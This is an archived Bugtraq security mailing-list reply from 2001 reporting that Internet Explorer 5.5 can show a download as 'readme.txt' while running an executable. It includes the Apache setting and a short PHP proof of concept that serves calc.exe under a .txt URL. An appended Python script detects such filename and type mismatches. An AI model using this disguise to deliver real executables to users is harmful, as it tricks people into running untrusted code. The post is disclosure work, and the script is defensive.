RE: File extensions spoofable in MSIE download dialog
From: StatiC (static@tampabay.rr.com)
Date: 11/29/01
- Previous message: Bernd Luevelsmeyer: "Re: Xitami Webserver stores admin password in clear text."
- Maybe in reply to: Jouko Pynnonen: "File extensions spoofable in MSIE download dialog"
- Next in thread: chef: "Re: File extensions spoofable in MSIE download dialog"
- Reply: chef: "Re: File extensions spoofable in MSIE download dialog"
- Reply: Jonathan G. Lampe: "RE: File extensions spoofable in MSIE download dialog"
Date: Wed, 28 Nov 2001 21:51:32 -0500
From: StatiC <static@tampabay.rr.com>
To: bugtraq@securityfocus.com
Subject: RE: File extensions spoofable in MSIE download dialog
Message-ID: <20011128215132.A1379@milla.xStatiCa.com>
I was playing with Apache configs a few months ago and noticed a similar issue with IE5.5. The procedure below will cause IE5.5 to display the open dialog for readme.txt but once opened, it executes immediately on IE5.5 SP2 with no hint that it is really getting an executable file called calc.exe. I only tested it with IE5.5.
With an Apache/PHP server, add .txt to the already existing .php extension in the apache.conf file, so that Apache will recognise .txt extensions as PHP script files.
1. Copy the real Windows calc.exe from a Windows system to the html root dir.
2. Copy the readme.txt file below to the same html root dir.
3. Go to the URL http://yourserver/readme.txt
You will see the same behavior mentioned in the previous alert.
FILE <readme.txt> BEGIN ----
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
FILE <readme.txt> END ----
Why does Microsoft think it is wise to trust the filename in the URL over what the header content-type is set to for display purposes, since the content-type seems to take priority for what will really happen with the file?
StatiC
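
A defender-side check for the mismatch this message describes, as an added example that is not part of the original post: it compares the extension in the requested URL with the filename in Content-Disposition and with the declared Content-Type, as a proxy or log-review script might. The function names, the extension list and the sample headers are assumptions constructed for illustration.

```python
import mimetypes
import posixpath
from email.message import Message
from urllib.parse import unquote, urlsplit

# Illustrative, not exhaustive: extensions Windows runs directly when opened.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".hta", ".vbs"}


def _ext(name):
    """Lower-cased final extension of a path or file name ('' if none)."""
    return posixpath.splitext(name.rstrip(". "))[1].lower()


def check_response(url, headers):
    """Return a list of findings for one (URL, response headers) pair."""
    msg = Message()
    for key, value in headers.items():
        msg[key] = value
    url_path = unquote(urlsplit(url).path)
    url_ext = _ext(url_path)
    served_name = msg.get_filename() or ""   # filename= from Content-Disposition
    served_ext = _ext(served_name)
    declared_type = msg.get_content_type()   # e.g. application/octet-stream
    expected_type = mimetypes.guess_type(url_path)[0]

    findings = []
    if served_ext and served_ext != url_ext:
        findings.append(f"name-mismatch: URL ends {url_ext or '(none)'} "
                        f"but header names {served_name}")
    if expected_type and "Content-Type" in msg and declared_type != expected_type:
        findings.append(f"type-mismatch: URL implies {expected_type}, "
                        f"header says {declared_type}")
    if served_ext in EXECUTABLE_EXTS and url_ext not in EXECUTABLE_EXTS:
        findings.append("executable-behind-benign-url")
    return findings


# Constructed samples: the first mirrors the headers in the message above.
SAMPLES = [
    ("http://yourserver/readme.txt",
     {"Content-Type": "application/octet-stream",
      "Content-Disposition": "attachment; filename=calc.exe"}),
    ("http://yourserver/notes.txt", {"Content-Type": "text/plain; charset=utf-8"}),
]

if __name__ == "__main__":
    for url, hdrs in SAMPLES:
        print(url, "->", check_response(url, hdrs) or "ok")
```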